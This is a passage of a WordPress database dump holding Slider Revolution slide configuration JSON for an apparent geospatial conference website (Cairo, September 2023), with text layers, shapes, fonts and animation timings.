"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"words\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"lines\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}}},\"frame_1\":{\"transform\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"timeline\":{\"endWithSlide\":false,\"frameLength\":300},\"chars\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"words\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"lines\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":3000,\"endWithSlide\":true,\"frameLength\":300}}},\"hoverFilterUsed\":false,\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":3000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"color\":{\"d\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"fontSize\":{\"d\":{\"v\":\"40\"},\"n\":{\"v\":\"36\"},\"t\":{\"v\":\"32\"},\"m\":{\"v\":\"28\"}},\"fontWeight\":{\"d\":{\"v\":\"900\"},\"n\":{\"v\":\"900\"},\"t\":{\"v\":\"900\"},\"m\":{\"v\":\"900\"}},\"lineHeight\":{\"d\":{\"v\":\"50\"},\"n\":{\"v\":\"45\"},\"t\":{\"v\":\"40\"},\"m\":{\"v\":\"35\"}},\"textAlign\":{\"d\":{\"v\":\"center\"},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"e\":true},\"borderWidth\":[0,0,0,0],\"textTransform\":\"uppercase\",\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0]},\"actions\":{\"action\":[],\"inactive_actions\":[]},\"type\":\"text\",\"version\":\"6.6.0\"},\"4\":{\"text\":\"Remote Sensing For Better Future\",\"alias\":\"text-4\",\"uid\":4,\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"655px\",\"e\":true},\"n\":{\"v\":\"595px\"},\"t\":{\"v\":\"535px\"},\"m\":{\"v\":\"475px\"}},\"height\":{\"d\":{\"e\":true}},\"minWidth\":{\"d\":{\"e\":true}},\"minHeight\":{\"d\":{\"v\":\"0px\",\"e\":true}},\"aspectRatio\":{\"d\":{\"v\":\"none\"},\"n\":{\"v\":\"none\"},\"t\":{\"v\":\"none\"},\"m\":{\"v\":\"none\"}},\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"241px\",\"e\":true},\"n\":{\"v\":\"219px\"},\"t\":{\"v\":\"197px\"},\"m\":{\"v\":\"175px\"}},\"y\":{\"d\":{\"v\":\"201px\",\"e\":true},\"n\":{\"v\":\"182px\"},\"t\":{\"v\":\"163px\"},\"m\":{\"v\":\"144px\"}},\"zIndex\":15,\"position\":\"absolute\"},\"group\":{\"groupOrder\":15},\"timeline\":{\"frames\":{\"frame_0\":{\"timeline\":{\"endWithSlide\":false}},\"frame_1\":{\"timeline\":{\"endWithSlide\":false,\"frameLength\":300}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":3000,\"endWithSlide\":true,\"frameLength\":300}}},\"hoverFilterUsed\":false,\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":3000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"color\":{\"d\":{\"v\":\"#fff\"},\"n\":{\"v\":\"#fff\"},\"t\":{\"v\":\"#fff\"},\"m\":{\"v\":\"#fff\"}},\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"fontFamily\":\"Arial\",\"fontSize\":{\"d\":{\"v\":\"40\"},\"n\":{\"v\":\"36\"},\"t\":{\"v\":\"32\"},\"m\":{\"v\":\"28\"}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"50\"},\"n\":{\"v\":\"45\"},\"t\":{\"v\":\"40\"},\"m\":{\"v\":\"35\"}},\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"e\":true},\"borderWidth\":[0,0,0,0],\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0]},\"actions\":{\"action\":[],\"inactive_actions\":[]},\"type\":\"text\",\"version\":\"6.6.0\"},\"8\":{\"text\":\"\\nCairo,Egypt,\\nSeptember 2-7, 2023\",\"alias\":\"Text-8\",\"uid\":8,\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"622px\",\"e\":true},\"n\":{\"v\":\"565px\"},\"t\":{\"v\":\"508px\"},\"m\":{\"v\":\"451px\"}},\"height\":{\"d\":{\"e\":true}},\"minWidth\":{\"d\":{\"e\":true}},\"minHeight\":{\"d\":{\"v\":\"0px\",\"e\":true}},\"aspectRatio\":{\"d\":{\"v\":\"none\"},\"n\":{\"v\":\"none\"},\"t\":{\"v\":\"none\"},\"m\":{\"v\":\"none\"}},\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"241px\",\"e\":true},\"n\":{\"v\":\"219px\"},\"t\":{\"v\":\"197px\"},\"m\":{\"v\":\"175px\"}},\"y\":{\"d\":{\"v\":\"251px\",\"e\":true},\"n\":{\"v\":\"228px\"},\"t\":{\"v\":\"205px\"},\"m\":{\"v\":\"182px\"}},\"zIndex\":13,\"position\":\"absolute\"},\"group\":{\"groupOrder\":13},\"timeline\":{\"frames\":{\"frame_0\":{\"timeline\":{\"endWithSlide\":false}},\"frame_1\":{\"timeline\":{\"endWithSlide\":false,\"frameLength\":300}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":3000,\"endWithSlide\":true,\"frameLength\":300}}},\"hoverFilterUsed\":false,\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":3000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"color\":{\"d\":{\"v\":\"#fff\"},\"n\":{\"v\":\"#fff\"},\"t\":{\"v\":\"#fff\"},\"m\":{\"v\":\"#fff\"}},\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"fontFamily\":\"Roboto Condensed\",\"fontSize\":{\"d\":{\"v\":\"36\"},\"n\":{\"v\":\"32\"},\"t\":{\"v\":\"28\"},\"m\":{\"v\":\"24\"}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"v\":\"1\"}},\"lineHeight\":{\"d\":{\"v\":\"40\"},\"n\":{\"v\":\"36\"},\"t\":{\"v\":\"32\"},\"m\":{\"v\":\"28\"}},\"textAlign\":{\"d\":{\"v\":\"center\"},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"e\":true},\"borderWidth\":[0,0,0,0],\"boxShadow\":{\"inuse\":true,\"hoffset\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"voffset\":{\"d\":{\"v\":\"10px\"},\"n\":{\"v\":\"9px\"},\"t\":{\"v\":\"8px\"},\"m\":{\"v\":\"7px\"}},\"blur\":{\"d\":{\"v\":\"10px\"},\"n\":{\"v\":\"9px\"},\"t\":{\"v\":\"8px\"},\"m\":{\"v\":\"7px\"}},\"spread\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"color\":\"rgba(0,0,0,0.25)\"},\"textShadow\":{\"inuse\":true,\"hoffset\":{\"d\":{\"v\":\"7px\"},\"n\":{\"v\":\"6px\"},\"t\":{\"v\":\"5px\"},\"m\":{\"v\":\"4px\"}},\"voffset\":{\"d\":{\"v\":\"7px\"},\"n\":{\"v\":\"6px\"},\"t\":{\"v\":\"5px\"},\"m\":{\"v\":\"4px\"}},\"blur\":{\"d\":{\"v\":\"10px\"},\"n\":{\"v\":\"9px\"},\"t\":{\"v\":\"8px\"},\"m\":{\"v\":\"7px\"}},\"color\":\"rgba(0,0,0,0.75)\"},\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0]},\"actions\":{\"action\":[],\"inactive_actions\":[]},\"type\":\"text\",\"version\":\"6.6.0\"},\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":11},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":11,\"position\":\"absolute\"},\"version\":\"6.6.0\"},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":10},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":10,\"position\":\"absolute\"},\"version\":\"6.6.0\"},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":9},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":9,\"position\":\"absolute\"},\"version\":\"6.6.0\"}}','{\"version\":\"6.6.0\"}'),
(12,5,2,'{\"runtime\":{\"collapsedGroups\":[]},\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#111111\",\"image\":\"https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/AAST-e1664974838122.jpg\",\"imageId\":2289,\"imageLib\":\"medialibrary\",\"mediaFilter\":\"slumber\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\"},\"imageWidth\":1772,\"imageHeight\":522,\"imageRatio\":3.3946360153256707},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"timeline\":{\"slots\":[\"default\"],\"duration\":[1000]},\"slideChange\":{\"in\":{\"o\":0},\"out\":{\"a\":false},\"title\":\"*opacity* Fade In\",\"main\":\"basic\",\"group\":\"fade\",\"preset\":\"fade\"}}','{\"1\":{\"text\":\"The First Geospatial Week in Africa and The Middle East\",\"alias\":\"Text-1\",\"uid\":1,\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"891.938px\",\"e\":true},\"n\":{\"v\":\"810px\"},\"t\":{\"v\":\"729px\"},\"m\":{\"v\":\"648px\"}},\"height\":{\"d\":{\"e\":true}},\"maxWidth\":{\"d\":{\"e\":true}},\"maxHeight\":{\"d\":{\"e\":true}},\"minWidth\":{\"d\":{\"e\":true}},\"minHeight\":{\"d\":{\"v\":\"0px\",\"e\":true}},\"aspectRatio\":{\"d\":{\"v\":\"none\"},\"n\":{\"v\":\"none\"},\"t\":{\"v\":\"none\"},\"m\":{\"v\":\"none\"}},\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"97px\",\"e\":true},\"n\":{\"v\":\"88px\"},\"t\":{\"v\":\"79px\"},\"m\":{\"v\":\"70px\"}},\"y\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"65px\"},\"t\":{\"v\":\"58px\"},\"m\":{\"v\":\"51px\"}},\"zIndex\":12},\"group\":{\"groupOrder\":12},\"timeline\":{\"frames\":{\"frame_0\":{\"transform\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"timeline\":{\"endWithSlide\":false},\"chars\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"words\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"lines\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}}},\"frame_1\":{\"transform\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"timeline\":{\"endWithSlide\":false,\"frameLength\":300},\"chars\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"words\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"lines\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":3000,\"endWithSlide\":true,\"frameLength\":300}}},\"hoverFilterUsed\":false,\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":3000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"color\":{\"d\":{\"v\":\"#007aff\",\"e\":true},\"n\":{\"v\":\"#007aff\"},\"t\":{\"v\":\"#007aff\"},\"m\":{\"v\":\"#007aff\"}},\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"fontSize\":{\"d\":{\"v\":\"40\"},\"n\":{\"v\":\"36\"},\"t\":{\"v\":\"32\"},\"m\":{\"v\":\"28\"}},\"fontWeight\":{\"d\":{\"v\":\"900\"},\"n\":{\"v\":\"900\"},\"t\":{\"v\":\"900\"},\"m\":{\"v\":\"900\"}},\"lineHeight\":{\"d\":{\"v\":\"50\"},\"n\":{\"v\":\"45\"},\"t\":{\"v\":\"40\"},\"m\":{\"v\":\"35\"}},\"textAlign\":{\"d\":{\"v\":\"center\"},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"e\":true},\"borderWidth\":[0,0,0,0],\"textTransform\":\"uppercase\",\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0]},\"actions\":{\"action\":[],\"inactive_actions\":[]},\"type\":\"text\"},\"12\":{\"text\":\"\",\"alias\":\"Shape\",\"uid\":12,\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"500px\",\"e\":true},\"n\":{\"v\":\"500px\"},\"t\":{\"v\":\"500px\"},\"m\":{\"v\":\"500px\"}},\"height\":{\"d\":{\"v\":\"500px\",\"e\":true},\"n\":{\"v\":\"500px\"},\"t\":{\"v\":\"500px\"},\"m\":{\"v\":\"500px\"}},\"originalWidth\":\"500px\",\"originalHeight\":\"500px\",\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"-5800px\",\"e\":true},\"n\":{\"v\":\"-5800px\"},\"t\":{\"v\":\"-5800px\"},\"m\":{\"v\":\"-5800px\"}},\"y\":{\"d\":{\"v\":\"-5100px\",\"e\":true},\"n\":{\"v\":\"-5100px\"},\"t\":{\"v\":\"-5100px\"},\"m\":{\"v\":\"-5100px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"position\":\"relative\",\"zIndex\":8},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frames\":{\"frame_0\":{\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"rotationZ\":45},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10,\"endWithSlide\":false},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"transform\":{\"rotationZ\":45},\"timeline\":{\"start\":10,\"startRelative\":10,\"endWithSlide\":false,\"frameLength\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"transform\":{\"opacity\":\"0\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":2690,\"endWithSlide\":true,\"frameLength\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"speed\":4000,\"yoyo_move\":true},\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":3000}],\"hoverFilterUsed\":false,\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"color\":{\"d\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":true},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":true},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"autolinebreak\":false,\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"borderColor\":\"rgba(255, 255, 255, 0.3)\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderStyle\":{\"d\":{\"v\":\"solid\"},\"n\":{\"v\":\"solid\"},\"t\":{\"v\":\"solid\"},\"m\":{\"v\":\"solid\"}},\"borderWidth\":[\"5px\",\"5px\",\"5px\",\"5px\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"triggerMemory\":\"keep\",\"action\":[],\"inactive_actions\":[],\"animationoverwrite\":\"wait\"},\"runtime\":{\"internalClass\":\"tp-shape tp-shapewrapper\"},\"type\":\"shape\"},\"14\":{\"text\":\"\",\"alias\":\"Shape\",\"uid\":14,\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"500px\",\"e\":true},\"n\":{\"v\":\"500px\"},\"t\":{\"v\":\"500px\"},\"m\":{\"v\":\"500px\"}},\"height\":{\"d\":{\"v\":\"500px\",\"e\":true},\"n\":{\"v\":\"500px\"},\"t\":{\"v\":\"500px\"},\"m\":{\"v\":\"500px\"}},\"originalWidth\":\"500px\",\"originalHeight\":\"500px\",\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"5800px\",\"e\":true},\"n\":{\"v\":\"5800px\"},\"t\":{\"v\":\"5800px\"},\"m\":{\"v\":\"5800px\"}},\"y\":{\"d\":{\"v\":\"5100px\",\"e\":true},\"n\":{\"v\":\"5100px\"},\"t\":{\"v\":\"5100px\"},\"m\":{\"v\":\"5100px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"position\":\"relative\",\"zIndex\":9},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frames\":{\"frame_0\":{\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"rotationZ\":45},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":10,\"startRelative\":10,\"endWithSlide\":false},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"transform\":{\"rotationZ\":45},\"timeline\":{\"start\":10,\"startRelative\":10,\"endWithSlide\":false,\"frameLength\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"transform\":{\"opacity\":\"0\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":2690,\"endWithSlide\":true,\"frameLength\":300},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"speed\":4000,\"yoyo_move\":true},\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":3000}],\"hoverFilterUsed\":false,\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"color\":{\"d\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":true},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":true},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"autolinebreak\":false,\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"borderColor\":\"rgba(255, 255, 255, 